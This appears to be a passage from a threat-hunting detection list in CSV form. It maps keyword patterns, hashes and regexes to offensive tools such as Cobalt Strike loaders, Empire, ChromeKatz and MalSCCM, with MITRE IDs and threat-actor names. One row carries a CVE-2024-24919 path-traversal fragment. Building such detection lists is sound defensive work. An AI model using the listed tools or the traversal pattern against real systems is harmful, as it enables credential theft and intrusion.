"*acb2c4419a7aa4cb0b812a179bdd51d579c0cc1f193b1b8911d64b2d3ff8f450*",".{0,1000}acb2c4419a7aa4cb0b812a179bdd51d579c0cc1f193b1b8911d64b2d3ff8f450.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","33100" "*acb7923ed1efb328d724977f2507a7a721a6c7cf630a3b37a9f4d7a3a2c7010c*",".{0,1000}acb7923ed1efb328d724977f2507a7a721a6c7cf630a3b37a9f4d7a3a2c7010c.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","33101" "*ACBypassTest*",".{0,1000}ACBypassTest.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 
SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-FodHelperBypass.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","33102" "*acc6cd307e1dd184b722a082c177639e78421f79b0e3b26fa602f1ce8392cc4f*",".{0,1000}acc6cd307e1dd184b722a082c177639e78421f79b0e3b26fa602f1ce8392cc4f.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","#filehash","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","33103" "*acc8594a9f95436e4e4a79fda6e54afad42acc212baaa52b442a161f115379d0*",".{0,1000}acc8594a9f95436e4e4a79fda6e54afad42acc212baaa52b442a161f115379d0.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","33104" "*acc8e858d44f1310d7c9f6d2544f7a004165279132f6433271b59b73f540dbde*",".{0,1000}acc8e858d44f1310d7c9f6d2544f7a004165279132f6433271b59b73f540dbde.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33105" "*acc9c65557132735ab0c7aae5bb2e2f996ab24508b37e62a8bb1024f3e1f1b14*",".{0,1000}acc9c65557132735ab0c7aae5bb2e2f996ab24508b37e62a8bb1024f3e1f1b14.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","33106" "*Accenture/Spartacus*",".{0,1000}Accenture\/Spartacus.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","33108" "*Access_Check -Method PSRemoting*",".{0,1000}Access_Check\s\-Method\sPSRemoting.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a 
post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","33109" "*AccessTokenImpersonationAccount*",".{0,1000}AccessTokenImpersonationAccount.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","33110" "*Accounts with extra permissions.txt*",".{0,1000}Accounts\swith\sextra\spermissions\.txt.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","33111" "*acd65a0c933308d9a867fb3701e39787a386708fbaabd907d41b3decdb481ca2*",".{0,1000}acd65a0c933308d9a867fb3701e39787a386708fbaabd907d41b3decdb481ca2.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/eladshamir/BadWindowsService","1","0","#filehash","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","33114" "*acd7392528b68181416263c966f899f4cd0b6430951ca09900739601c588eb5d*",".{0,1000}acd7392528b68181416263c966f899f4cd0b6430951ca09900739601c588eb5d.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","33115" "*acda112d8e7cf13a8d91628d58d53b7099fc9ae7ecf8e0b6b1c86fe6a8f0ef2d*",".{0,1000}acda112d8e7cf13a8d91628d58d53b7099fc9ae7ecf8e0b6b1c86fe6a8f0ef2d.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","33117" "*acda6b715fc3fdeed1f43c73e5467f5824093ac0*",".{0,1000}acda6b715fc3fdeed1f43c73e5467f5824093ac0.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","33118" "*ACE_Get-KerberosTicketCache.ps1*",".{0,1000}ACE_Get\-KerberosTicketCache\.ps1.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","33119" "*ACE_Get-KerberosTicketCache.ps1*",".{0,1000}ACE_Get\-KerberosTicketCache\.ps1.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","33120" "*ACE_Get-KerberosTicketCache.ps1*",".{0,1000}ACE_Get\-KerberosTicketCache\.ps1.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","33121" 
"*ace5f1151a4f4b7df43bfc7e45aa52d00aa4dc1642bbf1aa6f0872ffed1cd684*",".{0,1000}ace5f1151a4f4b7df43bfc7e45aa52d00aa4dc1642bbf1aa6f0872ffed1cd684.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33123" "*ace6030f3a6859f95a7c0ce956035e71a105e4daade9631c324e7e548aef77cb*",".{0,1000}ace6030f3a6859f95a7c0ce956035e71a105e4daade9631c324e7e548aef77cb.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","33124" "*aceb27720115a63b9d47e737fd878a61c52435ea4ec86ba8e58ee744bc85c4f3*",".{0,1000}aceb27720115a63b9d47e737fd878a61c52435ea4ec86ba8e58ee744bc85c4f3.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral 
Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","#filehash","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","33126" "*ACEE9097-0CA8-4520-A6CA-3BF97B7A86DE*",".{0,1000}ACEE9097\-0CA8\-4520\-A6CA\-3BF97B7A86DE.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","33127" "*AceLdr.*.bin*",".{0,1000}AceLdr\..{0,1000}\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - 
Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","N/A","10","10","925","164","2024-06-04T16:45:42Z","2022-08-11T00:06:09Z","33128" "*AceLdr.zip*",".{0,1000}AceLdr\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","N/A","10","10","925","164","2024-06-04T16:45:42Z","2022-08-11T00:06:09Z","33129" "*acf7a8a9-3aaf-46c2-8aa8-2d12d7681baf*",".{0,1000}acf7a8a9\-3aaf\-46c2\-8aa8\-2d12d7681baf.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","#GUIDproject","N/A","10","7","615","90","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z","33130" "*acffa7660aefbd032bf1125b81cbd9927ff4edb5e0a8d5b05200cdde90a42714*",".{0,1000}acffa7660aefbd032bf1125b81cbd9927ff4edb5e0a8d5b05200cdde90a42714.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an 'all in one' Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some of). and that has all relevant tooling included. 
You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#filehash","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","33131" "*acheron-master.zip*",".{0,1000}acheron\-master\.zip.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","N/A","4","326","39","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z","33132" "*ACLight.ps1*",".{0,1000}ACLight\.ps1.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","33133" "*ACLight.psd1*",".{0,1000}ACLight\.psd1.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","33134" "*ACLight.psm1*",".{0,1000}ACLight\.psm1.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","33135" 
"*ACLight2.ps1*",".{0,1000}ACLight2\.ps1.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","33136" "*ACLight2.psd1*",".{0,1000}ACLight2\.psd1.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","33137" "*ACLight2.psm1*",".{0,1000}ACLight2\.psm1.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","33138" "*ACLight-master*",".{0,1000}ACLight\-master.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","33139" "*aclpwn -f * -ft computer -t * -tt domain -d * -dry*",".{0,1000}aclpwn\s\-f\s.{0,1000}\s\-ft\scomputer\s\-t\s.{0,1000}\s\-tt\sdomain\s\-d\s.{0,1000}\s\-dry.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","33140" "*aclpwn.py*",".{0,1000}aclpwn\.py.{0,1000}","offensive_tool_keyword","Aclpwn","Aclpwn.py is a tool that interacts with BloodHound to identify and exploit ACL based privilege escalation paths. It takes a starting and ending point and will use Neo4j pathfinding algorithms to find the most efficient ACL based privilege escalation path. Aclpwn.py is similar to the PowerShell based Invoke-Aclpwn","T1098 - T1208 - T1550 - T1484 - T1486","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/fox-it/aclpwn.py","1","0","N/A","N/A","N/A","8","722","108","2021-11-18T03:47:24Z","2018-12-04T18:45:04Z","33141" "*acltoolkit *",".{0,1000}acltoolkit\s.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","N/A","2","120","12","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z","33143" "*acltoolkit.git*",".{0,1000}acltoolkit\.git.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","N/A","2","120","12","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z","33144" "*acltoolkit-ad*",".{0,1000}acltoolkit\-ad.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. 
It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","N/A","2","120","12","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z","33145" "*acltoolkit-main*",".{0,1000}acltoolkit\-main.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","N/A","2","120","12","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z","33146" "*acronis_trueimage_xpc_privesc*",".{0,1000}acronis_trueimage_xpc_privesc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","33148" "*AcroRd32.exe FUZZ*",".{0,1000}AcroRd32\.exe\sFUZZ.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","33149" "*aCSHELL/../../../../../../../*",".{0,1000}aCSHELL\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/.{0,1000}","offensive_tool_keyword","POC","CVE-2024-24919","T1005 - T1006 - T1078 - T1110 - T1135 - T1185","TA0001 - TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/LucasKatashi/CVE-2024-24919","1","1","#linux","N/A","10","1","13","5","2024-05-30T17:08:11Z","2024-05-30T16:23:18Z","33150" "*act as a named pipe server to be connected by other clients*",".{0,1000}act\sas\sa\snamed\spipe\sserver\sto\sbe\sconnected\sby\sother\sclients.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","33151" "*Action: Locating SCCM 
Management Servers*",".{0,1000}Action\:\sLocating\sSCCM\sManagement\sServers.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/nettitude/MalSCCM","1","0","N/A","N/A","10","3","246","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z","33152" "*Action: Locating SCCM Servers in Registry*",".{0,1000}Action\:\sLocating\sSCCM\sServers\sin\sRegistry.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/nettitude/MalSCCM","1","0","N/A","N/A","10","3","246","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z","33153" "*action=SchTaskCOMHijack *",".{0,1000}action\=SchTaskCOMHijack\s.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - 